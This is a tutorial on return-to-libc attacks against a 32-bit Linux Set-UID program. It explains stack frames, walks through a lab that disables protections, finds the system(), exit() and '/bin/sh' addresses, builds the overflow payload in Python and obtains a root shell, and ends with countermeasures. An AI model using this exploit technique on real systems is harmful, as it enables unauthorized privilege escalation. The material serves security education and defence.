
Return-to-libc attack

By using a buffer overflow attack, an attacker can cause a program to jump to injected shellcode and execute it. To prevent this, some operating systems, such as Fedora Linux, allow system administrators to make stacks non-executable; jumping to shellcode on the stack then makes the program crash instead of running the shellcode.

Unfortunately, this protection scheme is not foolproof. There is another type of attack, the return-to-libc attack, which does not need an executable stack and does not even use shellcode. Instead, it causes the vulnerable program to jump to existing code, such as the system() function in the libc library, which is already loaded into memory.

Prerequisites

The system function

The system() function is part of the libc library, and the way it works is simple: it starts a new shell process and passes its argument to that shell as the command to run. The new shell then executes this command.

What makes system() dangerous is that the invoked shell has the same effective user ID as its parent process. Therefore, if system("/bin/sh") is called in a privileged program, the invoked shell runs with privileged permissions, and so do the commands it executes. For example, a malicious user who can make a Set-UID root program call system("/bin/sh") obtains a root shell and can use it to harm the system.
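Conceptually, system() is a fork/exec/wait sequence. The Python sketch below models it with os.fork, os.execv and os.waitpid; it is a simplified illustration, not glibc's implementation (which also blocks SIGCHLD and ignores SIGINT/SIGQUIT while waiting), and the name sketch_system is hypothetical. The point it shows is that the child shell starts with the caller's real and effective user IDs.

```python
import os


def sketch_system(command: str) -> int:
    """Simplified model of C system(): run `command` with /bin/sh -c and wait."""
    pid = os.fork()
    if pid == 0:
        # Child: it starts with the same real and effective user IDs as the parent.
        try:
            os.execv("/bin/sh", ["sh", "-c", command])
        finally:
            os._exit(127)  # reached only if execv() failed
    # Parent: block until the shell exits and report its exit code.
    _, status = os.waitpid(pid, 0)
    return os.waitstatus_to_exitcode(status)


if __name__ == "__main__":
    # The shell prints the effective UID it runs with, i.e. the caller's.
    sketch_system("id -u")
```

Run from a Set-UID root process, the same sequence would print 0, which is exactly the privileged shell the attack is after.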


Activation record

Every function call gets its own region on the stack, and this region has a fixed structure. This region is called the activation record (or stack frame). We place our origin at the address held in the ebp register (the frame pointer); ebp points to the slot that stores the caller's previous ebp value. Right above it (at higher addresses) is the return address, followed by the first argument of the function, then the second, the third, and so on. Below ebp (at lower addresses) are the local variables; their exact order and padding are chosen by the compiler.

For example, consider this function:

#include <stdbool.h>  // for bool

void ARDemo (int k, int j, int i) {
    int a; 
    float r; 
    char c; 
    bool b; 
    short w; 
    // ...
}

While this function is executing, its activation record looks like the picture below:

[Figure: activation record of ARDemo()]
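Under the assumptions used throughout this article (32-bit x86, the cdecl calling convention, every argument occupying one 4-byte slot), the part of the frame above ebp can be computed mechanically. The helper frame_offsets below is hypothetical and only covers the saved ebp, the return address and the arguments; where the locals a, r, c, b and w end up below ebp is up to the compiler.

```python
WORD = 4  # size of one stack slot on 32-bit x86


def frame_offsets(arg_names: list[str]) -> dict[str, int]:
    """Offsets relative to ebp in a 32-bit cdecl frame, assuming 4-byte arguments."""
    layout = {"saved ebp": 0, "return address": WORD}
    for index, name in enumerate(arg_names):
        # Arguments are pushed right to left, so the first one ends up
        # at the lowest address, two slots above ebp.
        layout[name] = 2 * WORD + index * WORD
    return layout


for slot, offset in frame_offsets(["k", "j", "i"]).items():
    print(f"ebp + {offset:2d}: {slot}")
```

For ARDemo(k, j, i) this yields k at ebp + 8, j at ebp + 12 and i at ebp + 16, the same "return address, then first argument, then second" order described above.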

Function prologue and epilogue

To place an argument for the malicious function into memory, we need to know exactly how a function's memory is allocated and deallocated. Compilers generate a fixed piece of code at the entry and at the exit of each function for this purpose; these pieces are called the function prologue and epilogue.

Function prologue: this assembly code runs at the start of every function invocation:

pushl %ebp          # Save the caller's frame pointer
movl  %esp, %ebp    # Set the callee's frame pointer
subl  $N, %esp      # Reserve N bytes for the local variables

Before this code runs, the call instruction has already pushed the return address (denoted RA) onto the stack, so the stack pointer esp points to it. The first instruction, pushl %ebp, pushes the caller's frame pointer ebp onto the stack, so that it can be restored when the function returns. The second instruction sets the frame pointer ebp to the current frame, that is, to the current value of the stack pointer esp. The third instruction moves the stack pointer esp down by N bytes to reserve space for the function's local variables.
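The three prologue instructions can be replayed on a toy stack to see where everything lands. This is a minimal Python model in which memory is a dict from address to 32-bit word; the register values, the return address 0x08049200 and N = 16 are hypothetical.

```python
def prologue(esp: int, ebp: int, n: int, stack: dict[int, int]) -> tuple[int, int]:
    """Apply pushl %ebp; movl %esp, %ebp; subl $n, %esp to a toy 32-bit stack."""
    esp -= 4
    stack[esp] = ebp  # pushl %ebp: save the caller's frame pointer
    ebp = esp         # movl %esp, %ebp: the new frame starts here
    esp -= n          # subl $N, %esp: reserve N bytes for local variables
    return esp, ebp


# Hypothetical state right after `call` pushed the return address (RA).
stack = {0xFFFFD00C: 0x08049200}   # [esp] holds RA
esp, ebp = 0xFFFFD00C, 0xFFFFD038  # caller's esp and ebp

esp, ebp = prologue(esp, ebp, 16, stack)
print(hex(ebp), hex(esp))                    # 0xffffd008 0xffffcff8
print(hex(stack[ebp]), hex(stack[ebp + 4]))  # 0xffffd038 0x8049200
```

After the prologue, [ebp] is the saved frame pointer and [ebp + 4] is RA, matching the activation record layout.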

Function epilogue: like the prologue, the epilogue runs every time the function returns:

movl %ebp, %esp
popl %ebp
ret

This is the inverse of the prologue, so the caller's context can be restored. The first instruction moves the stack pointer back to the frame pointer, which releases the space of the local variables. The next instruction restores ebp to its previous value (the caller's frame pointer). The last instruction pops the return address from the stack and jumps to it.
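The epilogue can be modelled the same way. In this minimal Python sketch (toy dict-based memory, hypothetical addresses), the frame is set up by hand and the function returns the registers after ret, with eip being where execution continues.

```python
def epilogue(esp: int, ebp: int, stack: dict[int, int]) -> tuple[int, int, int]:
    """Apply movl %ebp, %esp; popl %ebp; ret to a toy 32-bit stack. Returns (esp, ebp, eip)."""
    esp = ebp         # movl %ebp, %esp: discard the local variables
    ebp = stack[esp]  # popl %ebp: restore the caller's frame pointer
    esp += 4
    eip = stack[esp]  # ret: pop the return address ...
    esp += 4
    return esp, ebp, eip  # ... and continue execution at eip


# Hypothetical frame: saved ebp at 0xffffd008, return address just above it.
stack = {0xFFFFD008: 0xFFFFD038, 0xFFFFD00C: 0x08049200}
print([hex(v) for v in epilogue(0xFFFFCFF8, 0xFFFFD008, stack)])
# ['0xffffd010', '0xffffd038', '0x8049200']
```

Note that ret blindly trusts the word at ebp + 4: if an overflow has replaced it, execution continues at whatever address the attacker wrote there.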


How does the attack happen?

Overview

There is a region in memory where plenty of code can be found: the region for the standard C library functions. In Linux, this library is called libc, and it is a dynamically linked library. Most programs use functions from libc, so before these programs start running, the operating system (through the dynamic loader) loads libc into memory.

So which function in libc can help an attacker achieve a malicious goal? Several such functions exist in libc, and the easiest one to use is system(). It simply invokes a new shell and has that shell execute the string argument passed to it. We just need to pass the string "/bin/sh" to system(), and it will spawn a new shell; since the vulnerable process is a Set-UID program, this shell will be privileged. Besides system(), many other functions can be used to harm the system, such as execv(), setuid(), etc.
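Because libc is already mapped into every running process that uses it, system() has a concrete address there. As a small illustration (Linux with glibc assumed), Python's standard ctypes module can look that symbol up inside the interpreter's own process. This is the Python process's address, not necessarily the one the vulnerable program will see.

```python
import ctypes

# CDLL(None) wraps dlopen(NULL): the running program plus the libraries it has loaded.
libc = ctypes.CDLL(None)


def symbol_address(name: str) -> int:
    """Return the address of a C function already loaded into this process."""
    func = getattr(libc, name)
    return ctypes.cast(func, ctypes.c_void_p).value


for name in ("system", "exit"):
    print(name, hex(symbol_address(name)))
```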

Experiment

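Since the return-to-libc attack on a 64-bit machine is much more difficult than on a 32-bit one (on x86-64, function arguments are passed in registers rather than on the stack, and user-space addresses contain zero bytes that stop strcpy()), we demonstrate it on a 32-bit machine for simplicity.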

Assume that we have the following program:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif

int bof(char *str)
{
    char buffer[BUF_SIZE];
    unsigned int *framep;
    
    strcpy(buffer, str);  
    
    return 1;
}

int main(int argc, char **argv)
{
   char input[1000];
   FILE *badfile;

   badfile = fopen("badfile", "r");
   int length = fread(input, sizeof(char), 1000, badfile);

   bof(input);

   return 1;
}

This program is vulnerable. First, main() reads up to 1000 bytes from the file named badfile (our exploit will write 300 bytes). Then it passes this input to bof() as str, and bof() copies str into the local array buffer with strcpy(). However, buffer has room for only 12 bytes (BUF_SIZE), and strcpy() does not check the size of the destination, so a longer input overflows it.
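To see why 12 bytes is not enough, the Python sketch below mimics strcpy() on a toy copy of bof()'s frame: it copies bytes up to and including the first NUL, with no check against the size of buffer. The 40-byte toy frame and the return-address offset 28 are illustrative assumptions here (Step 3 measures the real offset), and toy_strcpy is a hypothetical helper.

```python
def toy_strcpy(frame: bytearray, dest: int, src: bytes) -> int:
    """Copy src into frame at dest up to and including the first NUL, like strcpy().

    Nothing limits the copy to the 12-byte buffer; only the toy frame's end is
    checked. If src has no NUL, this sketch copies all of src (real strcpy()
    would keep reading memory).
    """
    nul = src.find(b"\x00")
    data = src if nul == -1 else src[: nul + 1]
    if dest + len(data) > len(frame):
        raise IndexError("copy runs past the end of the toy frame")
    frame[dest : dest + len(data)] = data
    return len(data)


BUF_SIZE = 12
RET_OFFSET = 28        # assumed distance from buffer to the saved return address
frame = bytearray(40)  # buffer at offset 0, return address at 28..31

payload = b"A" * RET_OFFSET + (0xF7E12420).to_bytes(4, "little") + b"\x00"
copied = toy_strcpy(frame, 0, payload)
print(copied > BUF_SIZE, hex(int.from_bytes(frame[RET_OFFSET:RET_OFFSET + 4], "little")))
# True 0xf7e12420
```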

Assume that the program has been compiled with the option -z noexecstack (which makes the stack non-executable), so we cannot inject shellcode and jump to it. This is where the return-to-libc attack comes in. The attack consists of 4 steps:

  1. Find the address of system() function
  2. Find the address of "/bin/sh"
  3. Find where exactly we should place the address
  4. Generate badfile content and perform the attack

Setup

For this experiment, some countermeasures need to be turned off.

  • Address space randomization:
$ sudo sysctl -w kernel.randomize_va_space=0
  • The StackGuard protection scheme (turned off at compile time):
$ gcc -m32 -fno-stack-protector example.c
  • Configuring /bin/sh: in Ubuntu 20.04, the /bin/sh symbolic link points to the /bin/dash shell. The dash shell has a countermeasure that prevents itself from being executed in a Set-UID process. Therefore, we link /bin/sh to /bin/zsh instead:
$ sudo ln -sf /bin/zsh /bin/sh
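Before running the experiment, a quick sanity check of the two system-wide settings can save debugging time. This Python sketch (Linux assumed; the helper names are hypothetical) reads the same kernel parameter that the sysctl command above sets, and resolves where /bin/sh actually points.

```python
import os
from pathlib import Path
from typing import Optional


def aslr_mode(path: str = "/proc/sys/kernel/randomize_va_space") -> Optional[int]:
    """0 = off, 1 = stack/mmap/vDSO randomized, 2 = heap (brk) too; None if unreadable."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None


def sh_target(path: str = "/bin/sh") -> str:
    """Follow the /bin/sh symlink chain to the real shell binary."""
    return os.path.realpath(path)


if __name__ == "__main__":
    print("randomize_va_space =", aslr_mode())  # expect 0 for this experiment
    print("/bin/sh ->", sh_target())            # expect a zsh binary, not dash
```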

Step 1: Find the address of system() function

In Linux, the libc library is loaded into a program's memory at runtime. When address space randomization is turned off, the library's address in a given program stays the same no matter how many times you run it (although it can differ between programs). Therefore, we can easily find the address of system() using a debugging tool such as gdb.

First, we create an empty badfile file for debugging:

$ touch badfile

Next, we compile the program with the debug flag -g. Remember to add the option -m32 to compile for the 32-bit architecture, together with the options that turn off the countermeasures:

$ gcc -m32 -fno-stack-protector -z noexecstack -g -o retlib_dbg retlib.c

Then, we make the program a Set-UID program. Note that even for the same program, if we change it from a Set-UID program to a non-Set-UID program, the libc library may not be loaded at the same location. Therefore, we need to debug the program in its Set-UID form, just like the target:

$ sudo chown root retlib_dbg
$ sudo chmod 4755 retlib_dbg

After that, we debug the program: set a breakpoint at the main function, run the program, and print out the address of system():

$ gdb -q retlib_dbg
gdb-peda$ b main
Breakpoint 1 at 0x12ef: file retlib.c, line 33
gdb-peda$ run
gdb-peda$ p system
0xf7e12420 
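The claim that libc stays at the same address when randomization is off can also be checked without gdb. The sketch below (Linux assumed; libc_base_in_new_process is a hypothetical helper) starts a fresh cat process, which prints its own memory map from /proc/self/maps, and reports where libc begins in it. Run it twice: with randomize_va_space set to 0 the two addresses should match, while with randomization enabled they will normally differ. This is cat's libc base, which need not equal the one inside retlib.

```python
import os
import subprocess
from typing import Optional


def libc_base_in_new_process() -> Optional[int]:
    """Run a fresh `cat /proc/self/maps` and return the lowest address mapped from libc."""
    maps = subprocess.run(["cat", "/proc/self/maps"], capture_output=True,
                          text=True, check=True).stdout
    starts = []
    for line in maps.splitlines():
        # Format: start-end perms offset dev inode [pathname]
        fields = line.split()
        if len(fields) >= 6:
            name = os.path.basename(fields[5])
            if name.startswith(("libc.", "libc-")):
                starts.append(int(fields[0].split("-")[0], 16))
    return min(starts) if starts else None


if __name__ == "__main__":
    first, second = libc_base_in_new_process(), libc_base_in_new_process()
    print(hex(first or 0), hex(second or 0), "same" if first == second else "different")
```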

Step 2: Find the address of "/bin/sh"

Now that we have the address of system(), we need the address of its argument, the string "/bin/sh", since we want to call system("/bin/sh") to invoke a privileged shell.

There are many ways to achieve this goal; we choose the environment variable method. We define a new shell variable MYSHELL=/bin/sh and export it, which turns it into an environment variable of every program started from this shell, including the target program.

$ export MYSHELL=/bin/sh

The location of this variable in memory can be found easily with the following program:

#include <stdio.h>
#include <stdlib.h>
int main(void) {
    char *shell = getenv("MYSHELL");
    if (shell) printf("%x\n", (unsigned int)shell);
    return 0;
}

Compile the code above into a binary called prtenv. The name of this program must have the same number of characters as the target program's name (here retlib), because the program name is pushed onto the stack before the environment variables; names of different lengths shift the addresses of the environment variables:

$ gcc -m32 -o prtenv prtenv.c

Running the program gives us the address of the string we need:

$ ./prtenv
ffffd0d7
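The effect of the program name can be illustrated with a deliberately simplified model of the top of a freshly started process's stack on Linux: the file name passed to execve() sits at the very top, and the environment strings are stored just below it. The model ignores the terminating NULL words, alignment and padding, and the top address and environment are hypothetical; env_value_address is a hypothetical helper. It only shows that the address getenv() returns shifts by exactly the difference in name lengths.

```python
def env_value_address(top: int, filename: str, env: list[str], name: str) -> int:
    """Simplified model: where getenv(name) would point in a freshly exec'd process."""
    addr = top - (len(filename) + 1)  # file name plus its NUL at the top of the stack
    for entry in reversed(env):       # env strings below it, last entry highest
        addr -= len(entry) + 1
        if entry.startswith(name + "="):
            return addr + len(name) + 1  # getenv() returns the part after "NAME="
    raise KeyError(name)


TOP = 0xFFFFE000  # hypothetical top of the stack
ENV = ["HOME=/home/seed", "MYSHELL=/bin/sh", "TERM=xterm"]  # hypothetical environment
for prog in ("./prtenv", "./retlib", "./retlib_dbg"):
    print(prog, hex(env_value_address(TOP, prog, ENV, "MYSHELL")))
```

In this model ./prtenv and ./retlib (both 8 characters) get the same address, while ./retlib_dbg, 4 characters longer, moves the string 4 bytes lower.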

Step 3: Find where exactly we should place the address

First, we need the distance from the start of buffer to the address stored in ebp. We can find this easily by debugging the program:

$ gdb -q retlib_dbg
gdb-peda$ b bof
gdb-peda$ run
gdb-peda$ next
gdb-peda$ p $ebp
0xffffc9c8
gdb-peda$ p &buffer
0xffffc9b0
gdb-peda$ p/d 0xffffc9c8 - 0xffffc9b0
24

The return address is stored right above the saved ebp value, which takes 4 bytes. Therefore, the address of system() must be placed at offset 24 + 4 = 28 of our input.
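The same arithmetic as a tiny Python snippet, using the two addresses from the gdb session above. On another machine the addresses can differ, but the calculation stays the same.

```python
WORD = 4  # size of a saved register or address on 32-bit x86

ebp_value = 0xFFFFC9C8    # `p $ebp` inside bof()
buffer_addr = 0xFFFFC9B0  # `p &buffer`

distance = ebp_value - buffer_addr  # bytes from buffer[0] to the saved ebp
ret_offset = distance + WORD        # the return address sits one word higher
print(distance, ret_offset)  # 24 28
```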

After the epilogue of bof() runs, ret has popped the return address, so the stack pointer points to the slot right above where the return address was stored (offset 32). Execution then jumps to system(). Its prologue pushes the current ebp onto the stack, which moves esp 4 bytes down (to offset 28), and the second prologue instruction sets ebp to esp. At that point, based on the activation record structure, the slot at ebp + 4 holds system()'s return address and the slot at ebp + 8 holds its first argument. Therefore, the address of "/bin/sh" must be placed at offset 28 + 4 + 4 = 36.

When system() returns, the program jumps to whatever value is in system()'s return-address slot and will most likely crash, unless we put a valid address there. Therefore, we find the address of the exit() function (in the same way as the address of system()) and put it at offset 28 + 4 = 32.
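The analysis can be replayed in Python. This sketch lays the three addresses used in this article into a toy copy of the overflowed region (starting at &buffer from Step 3), runs bof()'s epilogue on it, and then reads the stack the way system() sees it at its entry point: [esp] is its return address and [esp + 4] its first argument, which is equivalent to the ebp + 4 / ebp + 8 view after its prologue. The 40-byte region and the 0xaa filler are assumptions of the sketch.

```python
import struct

BUFFER = 0xFFFFC9B0  # &buffer from the gdb session in Step 3
SYSTEM, EXIT, BIN_SH = 0xF7E12420, 0xF7E04F80, 0xFFFFD2E7  # addresses used in this article

region = bytearray(b"\xaa" * 40)
struct.pack_into("<III", region, 28, SYSTEM, EXIT, BIN_SH)  # offsets 28, 32, 36


def word_at(addr: int) -> int:
    """Read a little-endian 32-bit word from the overflowed region."""
    (value,) = struct.unpack_from("<I", region, addr - BUFFER)
    return value


ebp = BUFFER + 24               # bof()'s frame pointer
esp = ebp                       # movl %ebp, %esp
ebp = word_at(esp); esp += 4    # popl %ebp: ebp now holds filler (0xaaaaaaaa)
eip = word_at(esp); esp += 4    # ret: jump to the overwritten return address
# At system()'s entry: [esp] is its return address, [esp + 4] its argument.
print(hex(eip), hex(word_at(esp)), hex(word_at(esp + 4)))
# 0xf7e12420 0xf7e04f80 0xffffd2e7
```

The clobbered ebp is harmless here, because system() only relies on esp at entry.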

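In summary, the layout of badfile is: offset 28 holds the address of system(), offset 32 holds the address of exit(), and offset 36 holds the address of the "/bin/sh" string; all other bytes are filler.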

Step 4: Generate badfile content and perform the attack

Now we construct the badfile content based on this analysis.

We will use a Python program to generate it:

#!/usr/bin/env python3
import sys

# Fill content with non-zero values (strcpy() stops at the first zero byte)
content = bytearray(0xaa for i in range(300))

X = 36
sh_addr = 0xffffd2e7    # The address of "/bin/sh" (use the value printed by prtenv)
content[X:X+4] = (sh_addr).to_bytes(4,byteorder='little')

Y = 28
system_addr = 0xf7e12420   # The address of system() (Step 1)
content[Y:Y+4] = (system_addr).to_bytes(4,byteorder='little')

Z = 32
exit_addr = 0xf7e04f80     # The address of exit() (found the same way as system())
content[Z:Z+4] = (exit_addr).to_bytes(4,byteorder='little')

# Save content to a file
with open("badfile", "wb") as f:
    f.write(content)
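An equivalent, slightly more defensive way to produce the same 300 bytes is sketched below. build_payload is a hypothetical helper, not part of the original exploit. It packs the three addresses with struct and rejects any payload containing a zero byte, because strcpy() in bof() stops at the first NUL and nothing after it would reach the stack.

```python
import struct


def build_payload(system_addr: int, exit_addr: int, sh_addr: int,
                  ret_offset: int = 28, size: int = 300) -> bytes:
    """Build the badfile layout described above; refuse payloads strcpy() would cut short."""
    content = bytearray(b"\xaa" * size)
    # system() at ret_offset, exit() right after it, then the "/bin/sh" pointer.
    struct.pack_into("<III", content, ret_offset, system_addr, exit_addr, sh_addr)
    if b"\x00" in content:
        raise ValueError("payload contains a NUL byte; strcpy() would stop copying there")
    return bytes(content)


payload = build_payload(0xF7E12420, 0xF7E04F80, 0xFFFFD2E7)
print(payload[28:40].hex())  # 2024e1f7804fe0f7e7d2ffff
```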

Finally, we run the exploit script to create badfile, and then run the target Set-UID program retlib. The # prompt shows that we obtained a root shell:

$ python3 exploit.py
$ ./retlib
#

Countermeasures

There are several countermeasures against this attack.

The first one is address space layout randomization (ASLR): the OS randomizes the starting addresses of the stack, the heap, and the shared libraries (including libc) every time a program runs. Therefore, it is much harder to guess the address of system() and the other addresses the attack needs.

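The second one is StackGuard, a protection against stack buffer overflows implemented in the gcc compiler (the countermeasure disabled above with -fno-stack-protector). It places a canary value between the local buffers and the return address and checks it before the function returns, so an overflow that overwrites the return address is detected and the program is aborted instead of jumping to the attacker's address.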
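The canary check can be illustrated with a toy model. In this Python sketch the frame layout (buffer, then canary, then return address), the placeholder return address "RETA" and the run_with_canary helper are all illustrative assumptions. The toy canary's first byte is zero so that a string copy cannot rewrite it and keep going; the remaining bytes are random.

```python
import secrets


def run_with_canary(data: bytes, buf_size: int = 12) -> str:
    """Toy model of a stack canary: buffer | canary | return address."""
    canary = b"\x00" + secrets.token_bytes(3)
    frame = bytearray(buf_size) + canary + b"RETA"
    if len(data) > len(frame):
        raise ValueError("toy frame too small for this input")
    frame[: len(data)] = data  # unchecked copy into the buffer (NUL handling omitted)
    # Check inserted before returning: has the canary changed?
    if frame[buf_size : buf_size + 4] != canary:
        return "stack smashing detected: abort"
    return "returned to " + frame[buf_size + 4 :].decode("latin-1")


print(run_with_canary(b"hello"))               # returned to RETA
print(run_with_canary(b"A" * 16 + b"EVIL"))    # stack smashing detected: abort
```

To reach the return address, the overflow has to pass through the canary first, which is what makes the check effective.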

Next, the /bin/dash shell has a countermeasure that prevents itself from being executed in a Set-UID process: if dash runs in a Set-UID process, it immediately changes its effective user ID to the process's real user ID, essentially dropping its privilege.

The last one is ASCII armoring. With this, system libraries such as libc are mapped at addresses that contain a zero byte (0x00). When the payload is copied with a string function like strcpy(), copying stops at this zero byte, so the attacker cannot place anything after such an address (for example, the argument of system()).
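Because x86 is little-endian, the zero byte of an ASCII-armored address is its last byte in memory order. The Python sketch below (the address 0x00e12420 is hypothetical) shows the consequence: strcpy() still writes that one address, with its zero byte serving as the terminator, but stops right after it, so the exit() address and the "/bin/sh" argument that must follow never reach the stack.

```python
def strcpy_copied(src: bytes) -> bytes:
    """Bytes that strcpy() writes: everything up to and including the first NUL."""
    nul = src.find(b"\x00")
    return src if nul == -1 else src[: nul + 1]


JUNK = b"\xaa" * 28
armored_system = 0x00E12420  # hypothetical ASCII-armored address: top byte is 0x00
payload = JUNK + armored_system.to_bytes(4, "little") + (0xF7E04F80).to_bytes(4, "little")
written = strcpy_copied(payload)
print(len(payload), len(written))  # 36 32
```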